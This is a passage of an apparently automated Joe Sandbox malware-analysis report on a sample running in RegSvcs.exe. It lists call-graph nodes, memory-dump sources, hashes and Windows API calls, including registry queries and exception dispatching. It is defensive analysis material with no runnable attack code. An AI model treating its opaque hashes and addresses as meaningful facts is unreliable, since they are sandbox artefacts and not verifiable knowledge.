calls 53050->53056 53057 6972478 2 API calls 53050->53057 53051 62677f7 53052 6267992 KiUserExceptionDispatcher 53051->53052 53053 62679ae 53052->53053 53053->52902 53054->53049 53055->53054 53056->53051 53057->53051 53059 6267708 53058->53059 53060 6267722 53059->53060 53066 6971fa8 LdrInitializeThunk 53059->53066 53061 6267763 KiUserExceptionDispatcher 53060->53061 53062 6267782 53061->53062 53067 6972418 2 API calls 53062->53067 53068 6972478 2 API calls 53062->53068 53063 62677f7 53064 6267992 KiUserExceptionDispatcher 53063->53064 53065 62679ae 53064->53065 53065->52902 53066->53060 53067->53063 53068->53063 53070 62675ff 53069->53070 53071 6267722 53070->53071 53077 6971fa8 LdrInitializeThunk 53070->53077 53072 6267763 KiUserExceptionDispatcher 53071->53072 53073 6267782 53072->53073 53078 6972418 2 API calls 53073->53078 53079 6972478 2 API calls 53073->53079 53074 62677f7 53075 6267992 KiUserExceptionDispatcher 53074->53075 53076 62679ae 53075->53076 53076->52902 53077->53071 53078->53074 53079->53074 53081 626797e KiUserExceptionDispatcher 53080->53081 53083 62679ae 53081->53083 53083->52902 53085 6267824 53084->53085 53086 6267992 KiUserExceptionDispatcher 53085->53086 53087 62679ae 53086->53087 53087->52902 53089 6267514 53088->53089 53090 6267722 53089->53090 53096 6971fa8 LdrInitializeThunk 53089->53096 53091 6267763 KiUserExceptionDispatcher 53090->53091 53092 6267782 53091->53092 53097 6972418 2 API calls 53092->53097 53098 6972478 2 API calls 53092->53098 53093 62677f7 53094 6267992 KiUserExceptionDispatcher 53093->53094 53095 62679ae 53094->53095 53095->52902 53096->53090 53097->53093 53098->53093 53100 6267796 53099->53100 53104 6972418 2 API calls 53100->53104 53105 6972478 2 API calls 53100->53105 53101 62677f7 53102 6267992 KiUserExceptionDispatcher 53101->53102 53103 62679ae 53102->53103 53103->52902 53104->53101 53105->53101 53107 626774f KiUserExceptionDispatcher 53106->53107 53109 6267782 53107->53109 53113 6972418 2 API calls 53109->53113 53114 6972478 2 API calls 53109->53114 53110 62677f7 53111 6267992 KiUserExceptionDispatcher 53110->53111 53112 62679ae 53111->53112 53112->52902 53113->53110 53114->53110 53116 6267551 53115->53116 53117 6267722 53116->53117 53123 6971fa8 LdrInitializeThunk 53116->53123 53118 6267763 KiUserExceptionDispatcher 53117->53118 53119 6267782 53118->53119 53124 6972418 2 API calls 53119->53124 53125 6972478 2 API calls 53119->53125 53120 62677f7 53121 6267992 KiUserExceptionDispatcher 53120->53121 53122 62679ae 53121->53122 53122->52902 53123->53117 53124->53120 53125->53120 53127 62675c2 53126->53127 53128 6267722 53127->53128 53136 6971fa8 LdrInitializeThunk 53127->53136 53129 6267763 KiUserExceptionDispatcher 53128->53129 53130 6267782 53129->53130 53134 6972418 2 API calls 53130->53134 53135 6972478 2 API calls 53130->53135 53131 62677f7 53132 6267992 KiUserExceptionDispatcher 53131->53132 53133 62679ae 53132->53133 53133->52902 53134->53131 53135->53131 53136->53128 53138 626763c 53137->53138 53144 6267722 53138->53144 53145 6971fa8 LdrInitializeThunk 53138->53145 53139 6267763 KiUserExceptionDispatcher 53140 6267782 53139->53140 53146 6972418 2 API calls 53140->53146 53147 6972478 2 API calls 53140->53147 53141 62677f7 53142 6267992 KiUserExceptionDispatcher 53141->53142 53143 62679ae 53142->53143 53143->52902 53144->53139 53145->53144 53146->53141 53147->53141 53149 62676c1 53148->53149 53150 6267722 53149->53150 53156 6971fa8 LdrInitializeThunk 53149->53156 53151 6267763 KiUserExceptionDispatcher 53150->53151 53152 6267782 53151->53152 53157 6972418 2 API calls 53152->53157 53158 6972478 2 API calls 53152->53158 53153 62677f7 53154 6267992 KiUserExceptionDispatcher 53153->53154 53155 62679ae 53154->53155 53155->52902 53156->53150 53157->53153 53158->53153 53160 62674b4 53159->53160 53161 6267722 53160->53161 53167 6971fa8 LdrInitializeThunk 53160->53167 53162 6267763 KiUserExceptionDispatcher 53161->53162 53163 6267782 53162->53163 53168 6972418 2 API calls 53163->53168 53169 6972478 2 API calls 53163->53169 53164 62677f7 53165 6267992 KiUserExceptionDispatcher 53164->53165 53166 62679ae 53165->53166 53166->52902 53167->53161 53168->53164 53169->53164 53171 62678b2 53170->53171 53172 6267992 KiUserExceptionDispatcher 53171->53172 53173 62679ae 53172->53173 53173->52902 53178 6972497 53174->53178 53175 6972700 53175->53020 53177 6971858 RegQueryValueExW 53177->53178 53178->53175 53178->53177 53185 697184c 53178->53185 53180 6972439 53179->53180 53184 697245c 53179->53184 53180->53020 53181 6972700 53181->53020 53182 697184c RegOpenKeyExW 53182->53184 53183 6971858 RegQueryValueExW 53183->53184 53184->53181 53184->53182 53184->53183 53186 6972788 RegOpenKeyExW 53185->53186 53188 697284e 53186->53188 53190 6971fb2 53189->53190 53191 697203f LdrInitializeThunk 53190->53191 53192 6971f63 53190->53192 53191->53192 53192->53027
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: D0k$Xck$Xck
                                                                                                    • API String ID: 0-1795155639
                                                                                                    • Opcode ID: da2937526e0127c118d88552889ce0708d9e0ce3b8b03dea69794f5c3fb5384e
                                                                                                    • Instruction ID: 8e2f29e0bcc1adfd5e965cf4eacfec1f14e94c85f0de2f24c48fcc7e99332f0f
                                                                                                    • Opcode Fuzzy Hash: da2937526e0127c118d88552889ce0708d9e0ce3b8b03dea69794f5c3fb5384e
                                                                                                    • Instruction Fuzzy Hash: 9172CF30B003159FDB54EBA8C854BAEB7F6AF89204F248469E40ADB785DB34DC46C7E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5ecc73cf78a43d6c211cc1fefc8a97a4da8e15748e07d7a9974b40bcc5f2250a
                                                                                                    • Instruction ID: 2e4912f7f1116b49c00031c8acd807573eb29406306ca99868afc0e676ec32de
                                                                                                    • Opcode Fuzzy Hash: 5ecc73cf78a43d6c211cc1fefc8a97a4da8e15748e07d7a9974b40bcc5f2250a
                                                                                                    • Instruction Fuzzy Hash: 44531C30D10B1A8EDB61EF68C980699F7F5FF99310F10D69AD459A7610EB70AAC4CF81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ec45150400acebae0f49ffee2444f723955dd25772b1cc4329b578cbedc0e3bd
                                                                                                    • Instruction ID: afcb5ddb0a14bc736852a1a2ad0e390e370dc3f47d6e068b05b04eaadd483d2c
                                                                                                    • Opcode Fuzzy Hash: ec45150400acebae0f49ffee2444f723955dd25772b1cc4329b578cbedc0e3bd
                                                                                                    • Instruction Fuzzy Hash: 29433F30D10B198EDB61EF68C984699F7F5FF99310F10C69AD459AB611EB30AAC4CF81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521986076.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6970000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: b27ec6a3e317430016ce9ac3931aaed7f617c4dd4061a601a9fdbd25cdf36003
                                                                                                    • Instruction ID: 5f4715447bf8d550fffab44e4a75fb73677b65a37bb4218f1a9170d2345d20b6
                                                                                                    • Opcode Fuzzy Hash: b27ec6a3e317430016ce9ac3931aaed7f617c4dd4061a601a9fdbd25cdf36003
                                                                                                    • Instruction Fuzzy Hash: 4151A270A002059FCB54FBB4D845AEEB7FAFF89208B148969D5129F395DF34E944CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0690C6A0
                                                                                                    • GetCurrentThread.KERNEL32 ref: 0690C6DD
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0690C71A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0690C773
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521899384.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6900000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$ProcessThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2063062207-0
                                                                                                    • Opcode ID: e71886d8c37b7982d0a9ffca68b7dff44f3cbc68ba48e1509dcfefb14f2d5e11
                                                                                                    • Instruction ID: 6f8f3016f4eb6799c4d706e55a2ece24b2c55a761c4bf98bee90aecebd1f2bbc
                                                                                                    • Opcode Fuzzy Hash: e71886d8c37b7982d0a9ffca68b7dff44f3cbc68ba48e1509dcfefb14f2d5e11
                                                                                                    • Instruction Fuzzy Hash: 435142B4900209DFDB14CFAAD948BDEBBF1EF88314F208559E409B7790D734A884CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0690C6A0
                                                                                                    • GetCurrentThread.KERNEL32 ref: 0690C6DD
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0690C71A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0690C773
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521899384.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6900000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$ProcessThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2063062207-0
                                                                                                    • Opcode ID: 2531e1b15636bc5f1625854d265b29341762c97dcf099ac0b047c46d5d93f050
                                                                                                    • Instruction ID: 839455b15a6e0a548ce22150e9941374a33a489e8f122f694690de74114e61d2
                                                                                                    • Opcode Fuzzy Hash: 2531e1b15636bc5f1625854d265b29341762c97dcf099ac0b047c46d5d93f050
                                                                                                    • Instruction Fuzzy Hash: EA5131B4900209DFDB14CFAAD948BDEBBF1EF88314F208559E409B77A0D7749884CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1304 62674c5-62674eb 1483 62674eb call 69a58db 1304->1483 1484 62674eb call 69a5938 1304->1484 1308 62674f1-6267528 1496 6267528 call 69a61a8 1308->1496 1497 6267528 call 69a5fde 1308->1497 1498 6267528 call 69a60f0 1308->1498 1499 6267528 call 69a5dd0 1308->1499 1500 6267528 call 69a6230 1308->1500 1311 626752e-62675d6 1507 62675d6 call 626fb43 1311->1507 1508 62675d6 call 626f5d0 1311->1508 1509 62675d6 call 626fc48 1311->1509 1510 62675d6 call 626fb98 1311->1510 1511 62675d6 call 626f978 1311->1511 1512 62675d6 call 626f5b9 1311->1512 1320 62675dc-6267613 1517 6267613 call 6970006 1320->1517 1518 6267613 call 6970371 1320->1518 1519 6267613 call 6970040 1320->1519 1323 6267619-6267650 1525 6267650 call 6971165 1323->1525 1526 6267650 call 6970998 1323->1526 1527 6267650 call 69709a8 1323->1527 1528 6267650 call 6971558 1323->1528 1529 6267650 call 69710b8 1323->1529 1530 6267650 call 69710a8 1323->1530 1326 6267656-62676d5 1448 62676d5 call 6971d27 1326->1448 1449 62676d5 call 6971e27 1326->1449 1450 62676d5 call 6971bd0 1326->1450 1451 62676d5 call 6971bc0 1326->1451 1452 62676d5 call 6971d69 1326->1452 1453 62676d5 call 6971dc8 1326->1453 1332 62676db-626771c 1461 626771c call 6971f47 1332->1461 1462 626771c call 6971e88 1332->1462 1463 626771c call 6971ee8 1332->1463 1464 626771c call 6971fa8 1332->1464 1335 6267722-62677aa KiUserExceptionDispatcher 1470 62677aa call 69722f7 1335->1470 1471 62677aa call 69723b7 1335->1471 1472 62677aa call 6972358 1335->1472 1340 62677b0-62677f1 1474 62677f1 call 6972418 1340->1474 1475 62677f1 call 6972478 1340->1475 1343 62677f7-6267838 1488 6267838 call 6972cc0 1343->1488 1489 6267838 call 6972b70 1343->1489 1490 6267838 call 6972d1f 1343->1490 1346 626783e-626787f 1493 626787f call 6972d80 1346->1493 1494 626787f call 6972de0 1346->1494 1349 6267885-626794b 1513 626794b call 6974c68 1349->1513 1514 626794b call 6974b18 1349->1514 1358 6267951-62679ef KiUserExceptionDispatcher 1534 62679ef call 6976823 1358->1534 1535 62679ef call 6976760 1358->1535 1536 62679ef call 69766af 1358->1536 1537 62679ef call 69767bf 1358->1537 1364 62679f5-6267a36 1538 6267a36 call 6976823 1364->1538 1539 6267a36 call 6976880 1364->1539 1367 6267a3c-6267a7d 1456 6267a7d call 6977183 1367->1456 1457 6267a7d call 6976d18 1367->1457 1458 6267a7d call 6976bc8 1367->1458 1370 6267a83-6267ac4 1459 6267ac4 call 6978671 1370->1459 1460 6267ac4 call 6978680 1370->1460 1373 6267aca-6267b52 1467 6267b52 call 6978e21 1373->1467 1468 6267b52 call 6978e80 1373->1468 1469 6267b52 call 6978edf 1373->1469 1379 6267b58-6267b9c 1479 6267b9c call 6978fa0 1379->1479 1480 6267b9c call 6978f40 1379->1480 1481 6267b9c call 697928c 1379->1481 1482 6267b9c call 6979238 1379->1482 1382 6267ba2-6267bda 1485 6267bda call 697f917 1382->1485 1486 6267bda call 697f310 1382->1486 1487 6267bda call 697f320 1382->1487 1385 6267be0-6267c24 1501 6267c24 call 697fa37 1385->1501 1502 6267c24 call 697f9d4 1385->1502 1503 6267c24 call 697f989 1385->1503 1504 6267c24 call 697f9d8 1385->1504 1388 6267c2a-6267d4c 1520 6267d4c call 6900ab0 1388->1520 1521 6267d4c call 6900b60 1388->1521 1522 6267d4c call 6900e92 1388->1522 1523 6267d4c call 6900f28 1388->1523 1524 6267d4c call 6900eba 1388->1524 1400 6267d52-6267d8a 1531 6267d8a call 6901060 1400->1531 1532 6267d8a call 6900fff 1400->1532 1533 6267d8a call 69010bf 1400->1533 1403 6267d90-6267e12 1454 6267e12 call 6901180 1403->1454 1455 6267e12 call 6901120 1403->1455 1409 6267e18-6267e9a 1465 6267e9a call 6901ec8 1409->1465 1466 6267e9a call 6901dc8 1409->1466 1415 6267ea0-6267f2e call 69022e8 1476 6267f2e call 6902f00 1415->1476 1477 6267f2e call 69030e0 1415->1477 1478 6267f2e call 690313f 1415->1478 1421 6267f34-6267f78 1491 6267f78 call 6903200 1421->1491 1492 6267f78 call 69031a0 1421->1492 1424 6267f7e-626800c call 690479a 1505 626800c call 69049b0 1424->1505 1506 626800c call 69047c2 1424->1506 1430 6268012-62680ea 1515 62680ea call 6905798 1430->1515 1516 62680ea call 69057f8 1430->1516 1439 62680f0-626817e 1540 626817e call 6905bf0 1439->1540 1541 626817e call 6905b92 1439->1541 1445 6268184-62681d5 1448->1332 1449->1332 1450->1332 1451->1332 1452->1332 1453->1332 1454->1409 1455->1409 1456->1370 1457->1370 1458->1370 1459->1373 1460->1373 1461->1335 1462->1335 1463->1335 1464->1335 1465->1415 1466->1415 1467->1379 1468->1379 1469->1379 1470->1340 1471->1340 1472->1340 1474->1343 1475->1343 1476->1421 1477->1421 1478->1421 1479->1382 1480->1382 1481->1382 1482->1382 1483->1308 1484->1308 1485->1385 1486->1385 1487->1385 1488->1346 1489->1346 1490->1346 1491->1424 1492->1424 1493->1349 1494->1349 1496->1311 1497->1311 1498->1311 1499->1311 1500->1311 1501->1388 1502->1388 1503->1388 1504->1388 1505->1430 1506->1430 1507->1320 1508->1320 1509->1320 1510->1320 1511->1320 1512->1320 1513->1358 1514->1358 1515->1439 1516->1439 1517->1323 1518->1323 1519->1323 1520->1400 1521->1400 1522->1400 1523->1400 1524->1400 1525->1326 1526->1326 1527->1326 1528->1326 1529->1326 1530->1326 1531->1403 1532->1403 1533->1403 1534->1364 1535->1364 1536->1364 1537->1364 1538->1367 1539->1367 1540->1445 1541->1445
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: b624b044222941e033ff4f5790efef469c6feb5379e28109f7b676fa2f4a1af7
                                                                                                    • Instruction ID: fc6f738e93d979983edd09ee312278453ab4bcd425d9c9ac52b52c9c981ab86b
                                                                                                    • Opcode Fuzzy Hash: b624b044222941e033ff4f5790efef469c6feb5379e28109f7b676fa2f4a1af7
                                                                                                    • Instruction Fuzzy Hash: 4D02C734911368CFDB65DF30E88C699B7B6BF4931AF1041E9D90A96340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1542 62674ae-62674eb 1739 62674eb call 69a58db 1542->1739 1740 62674eb call 69a5938 1542->1740 1546 62674f1-6267528 1744 6267528 call 69a61a8 1546->1744 1745 6267528 call 69a5fde 1546->1745 1746 6267528 call 69a60f0 1546->1746 1747 6267528 call 69a5dd0 1546->1747 1748 6267528 call 69a6230 1546->1748 1549 626752e-62675d6 1760 62675d6 call 626fb43 1549->1760 1761 62675d6 call 626f5d0 1549->1761 1762 62675d6 call 626fc48 1549->1762 1763 62675d6 call 626fb98 1549->1763 1764 62675d6 call 626f978 1549->1764 1765 62675d6 call 626f5b9 1549->1765 1558 62675dc-6267613 1766 6267613 call 6970006 1558->1766 1767 6267613 call 6970371 1558->1767 1768 6267613 call 6970040 1558->1768 1561 6267619-6267650 1686 6267650 call 6971165 1561->1686 1687 6267650 call 6970998 1561->1687 1688 6267650 call 69709a8 1561->1688 1689 6267650 call 6971558 1561->1689 1690 6267650 call 69710b8 1561->1690 1691 6267650 call 69710a8 1561->1691 1564 6267656-62676d5 1702 62676d5 call 6971d27 1564->1702 1703 62676d5 call 6971e27 1564->1703 1704 62676d5 call 6971bd0 1564->1704 1705 62676d5 call 6971bc0 1564->1705 1706 62676d5 call 6971d69 1564->1706 1707 62676d5 call 6971dc8 1564->1707 1570 62676db-626771c 1710 626771c call 6971f47 1570->1710 1711 626771c call 6971e88 1570->1711 1712 626771c call 6971ee8 1570->1712 1713 626771c call 6971fa8 1570->1713 1573 6267722-62677aa KiUserExceptionDispatcher 1718 62677aa call 69722f7 1573->1718 1719 62677aa call 69723b7 1573->1719 1720 62677aa call 6972358 1573->1720 1578 62677b0-62677f1 1729 62677f1 call 6972418 1578->1729 1730 62677f1 call 6972478 1578->1730 1581 62677f7-6267838 1734 6267838 call 6972cc0 1581->1734 1735 6267838 call 6972b70 1581->1735 1736 6267838 call 6972d1f 1581->1736 1584 626783e-626787f 1753 626787f call 6972d80 1584->1753 1754 626787f call 6972de0 1584->1754 1587 6267885-626794b 1758 626794b call 6974c68 1587->1758 1759 626794b call 6974b18 1587->1759 1596 6267951-62679ef KiUserExceptionDispatcher 1776 62679ef call 6976823 1596->1776 1777 62679ef call 6976760 1596->1777 1778 62679ef call 69766af 1596->1778 1779 62679ef call 69767bf 1596->1779 1602 62679f5-6267a36 1695 6267a36 call 6976823 1602->1695 1696 6267a36 call 6976880 1602->1696 1605 6267a3c-6267a7d 1699 6267a7d call 6977183 1605->1699 1700 6267a7d call 6976d18 1605->1700 1701 6267a7d call 6976bc8 1605->1701 1608 6267a83-6267ac4 1714 6267ac4 call 6978671 1608->1714 1715 6267ac4 call 6978680 1608->1715 1611 6267aca-6267b52 1722 6267b52 call 6978e21 1611->1722 1723 6267b52 call 6978e80 1611->1723 1724 6267b52 call 6978edf 1611->1724 1617 6267b58-6267b9c 1725 6267b9c call 6978fa0 1617->1725 1726 6267b9c call 6978f40 1617->1726 1727 6267b9c call 697928c 1617->1727 1728 6267b9c call 6979238 1617->1728 1620 6267ba2-6267bda 1741 6267bda call 697f917 1620->1741 1742 6267bda call 697f310 1620->1742 1743 6267bda call 697f320 1620->1743 1623 6267be0-6267c24 1749 6267c24 call 697fa37 1623->1749 1750 6267c24 call 697f9d4 1623->1750 1751 6267c24 call 697f989 1623->1751 1752 6267c24 call 697f9d8 1623->1752 1626 6267c2a-6267d4c 1769 6267d4c call 6900ab0 1626->1769 1770 6267d4c call 6900b60 1626->1770 1771 6267d4c call 6900e92 1626->1771 1772 6267d4c call 6900f28 1626->1772 1773 6267d4c call 6900eba 1626->1773 1638 6267d52-6267d8a 1692 6267d8a call 6901060 1638->1692 1693 6267d8a call 6900fff 1638->1693 1694 6267d8a call 69010bf 1638->1694 1641 6267d90-6267e12 1708 6267e12 call 6901180 1641->1708 1709 6267e12 call 6901120 1641->1709 1647 6267e18-6267e9a 1716 6267e9a call 6901ec8 1647->1716 1717 6267e9a call 6901dc8 1647->1717 1653 6267ea0-6267f2e call 69022e8 1731 6267f2e call 6902f00 1653->1731 1732 6267f2e call 69030e0 1653->1732 1733 6267f2e call 690313f 1653->1733 1659 6267f34-6267f78 1737 6267f78 call 6903200 1659->1737 1738 6267f78 call 69031a0 1659->1738 1662 6267f7e-626800c call 690479a 1756 626800c call 69049b0 1662->1756 1757 626800c call 69047c2 1662->1757 1668 6268012-62680ea 1774 62680ea call 6905798 1668->1774 1775 62680ea call 69057f8 1668->1775 1677 62680f0-626817e 1697 626817e call 6905bf0 1677->1697 1698 626817e call 6905b92 1677->1698 1683 6268184-62681d5 1686->1564 1687->1564 1688->1564 1689->1564 1690->1564 1691->1564 1692->1641 1693->1641 1694->1641 1695->1605 1696->1605 1697->1683 1698->1683 1699->1608 1700->1608 1701->1608 1702->1570 1703->1570 1704->1570 1705->1570 1706->1570 1707->1570 1708->1647 1709->1647 1710->1573 1711->1573 1712->1573 1713->1573 1714->1611 1715->1611 1716->1653 1717->1653 1718->1578 1719->1578 1720->1578 1722->1617 1723->1617 1724->1617 1725->1620 1726->1620 1727->1620 1728->1620 1729->1581 1730->1581 1731->1659 1732->1659 1733->1659 1734->1584 1735->1584 1736->1584 1737->1662 1738->1662 1739->1546 1740->1546 1741->1623 1742->1623 1743->1623 1744->1549 1745->1549 1746->1549 1747->1549 1748->1549 1749->1626 1750->1626 1751->1626 1752->1626 1753->1587 1754->1587 1756->1668 1757->1668 1758->1596 1759->1596 1760->1558 1761->1558 1762->1558 1763->1558 1764->1558 1765->1558 1766->1561 1767->1561 1768->1561 1769->1638 1770->1638 1771->1638 1772->1638 1773->1638 1774->1677 1775->1677 1776->1602 1777->1602 1778->1602 1779->1602
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 17b51d2d16eeee8d85f34bbdb20efa26d6bbb53a8fa8192daa2b820de8a4e3ea
                                                                                                    • Instruction ID: 28edd4ec8c290415ade0e051b318d1f8331416c79631a4bf4cda3a07ac442572
                                                                                                    • Opcode Fuzzy Hash: 17b51d2d16eeee8d85f34bbdb20efa26d6bbb53a8fa8192daa2b820de8a4e3ea
                                                                                                    • Instruction Fuzzy Hash: 8102B734911368CFDBA5DF30E88C699B7B6BF4931AF1041E9D90A56340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1780 6267502-6267528 1984 6267528 call 69a61a8 1780->1984 1985 6267528 call 69a5fde 1780->1985 1986 6267528 call 69a60f0 1780->1986 1987 6267528 call 69a5dd0 1780->1987 1988 6267528 call 69a6230 1780->1988 1784 626752e-62675d6 1995 62675d6 call 626fb43 1784->1995 1996 62675d6 call 626f5d0 1784->1996 1997 62675d6 call 626fc48 1784->1997 1998 62675d6 call 626fb98 1784->1998 1999 62675d6 call 626f978 1784->1999 2000 62675d6 call 626f5b9 1784->2000 1793 62675dc-6267613 2005 6267613 call 6970006 1793->2005 2006 6267613 call 6970371 1793->2006 2007 6267613 call 6970040 1793->2007 1796 6267619-6267650 1921 6267650 call 6971165 1796->1921 1922 6267650 call 6970998 1796->1922 1923 6267650 call 69709a8 1796->1923 1924 6267650 call 6971558 1796->1924 1925 6267650 call 69710b8 1796->1925 1926 6267650 call 69710a8 1796->1926 1799 6267656-62676d5 1938 62676d5 call 6971d27 1799->1938 1939 62676d5 call 6971e27 1799->1939 1940 62676d5 call 6971bd0 1799->1940 1941 62676d5 call 6971bc0 1799->1941 1942 62676d5 call 6971d69 1799->1942 1943 62676d5 call 6971dc8 1799->1943 1805 62676db-626771c 1951 626771c call 6971f47 1805->1951 1952 626771c call 6971e88 1805->1952 1953 626771c call 6971ee8 1805->1953 1954 626771c call 6971fa8 1805->1954 1808 6267722-62677aa KiUserExceptionDispatcher 1960 62677aa call 69722f7 1808->1960 1961 62677aa call 69723b7 1808->1961 1962 62677aa call 6972358 1808->1962 1813 62677b0-62677f1 1964 62677f1 call 6972418 1813->1964 1965 62677f1 call 6972478 1813->1965 1816 62677f7-6267838 1976 6267838 call 6972cc0 1816->1976 1977 6267838 call 6972b70 1816->1977 1978 6267838 call 6972d1f 1816->1978 1819 626783e-626787f 1981 626787f call 6972d80 1819->1981 1982 626787f call 6972de0 1819->1982 1822 6267885-626794b 2001 626794b call 6974c68 1822->2001 2002 626794b call 6974b18 1822->2002 1831 6267951-62679ef KiUserExceptionDispatcher 1930 62679ef call 6976823 1831->1930 1931 62679ef call 6976760 1831->1931 1932 62679ef call 69766af 1831->1932 1933 62679ef call 69767bf 1831->1933 1837 62679f5-6267a36 1934 6267a36 call 6976823 1837->1934 1935 6267a36 call 6976880 1837->1935 1840 6267a3c-6267a7d 1946 6267a7d call 6977183 1840->1946 1947 6267a7d call 6976d18 1840->1947 1948 6267a7d call 6976bc8 1840->1948 1843 6267a83-6267ac4 1949 6267ac4 call 6978671 1843->1949 1950 6267ac4 call 6978680 1843->1950 1846 6267aca-6267b52 1957 6267b52 call 6978e21 1846->1957 1958 6267b52 call 6978e80 1846->1958 1959 6267b52 call 6978edf 1846->1959 1852 6267b58-6267b9c 1969 6267b9c call 6978fa0 1852->1969 1970 6267b9c call 6978f40 1852->1970 1971 6267b9c call 697928c 1852->1971 1972 6267b9c call 6979238 1852->1972 1855 6267ba2-6267bda 1973 6267bda call 697f917 1855->1973 1974 6267bda call 697f310 1855->1974 1975 6267bda call 697f320 1855->1975 1858 6267be0-6267c24 1989 6267c24 call 697fa37 1858->1989 1990 6267c24 call 697f9d4 1858->1990 1991 6267c24 call 697f989 1858->1991 1992 6267c24 call 697f9d8 1858->1992 1861 6267c2a-6267d4c 2008 6267d4c call 6900ab0 1861->2008 2009 6267d4c call 6900b60 1861->2009 2010 6267d4c call 6900e92 1861->2010 2011 6267d4c call 6900f28 1861->2011 2012 6267d4c call 6900eba 1861->2012 1873 6267d52-6267d8a 1927 6267d8a call 6901060 1873->1927 1928 6267d8a call 6900fff 1873->1928 1929 6267d8a call 69010bf 1873->1929 1876 6267d90-6267e12 1944 6267e12 call 6901180 1876->1944 1945 6267e12 call 6901120 1876->1945 1882 6267e18-6267e9a 1955 6267e9a call 6901ec8 1882->1955 1956 6267e9a call 6901dc8 1882->1956 1888 6267ea0-6267f2e call 69022e8 1966 6267f2e call 6902f00 1888->1966 1967 6267f2e call 69030e0 1888->1967 1968 6267f2e call 690313f 1888->1968 1894 6267f34-6267f78 1979 6267f78 call 6903200 1894->1979 1980 6267f78 call 69031a0 1894->1980 1897 6267f7e-626800c call 690479a 1993 626800c call 69049b0 1897->1993 1994 626800c call 69047c2 1897->1994 1903 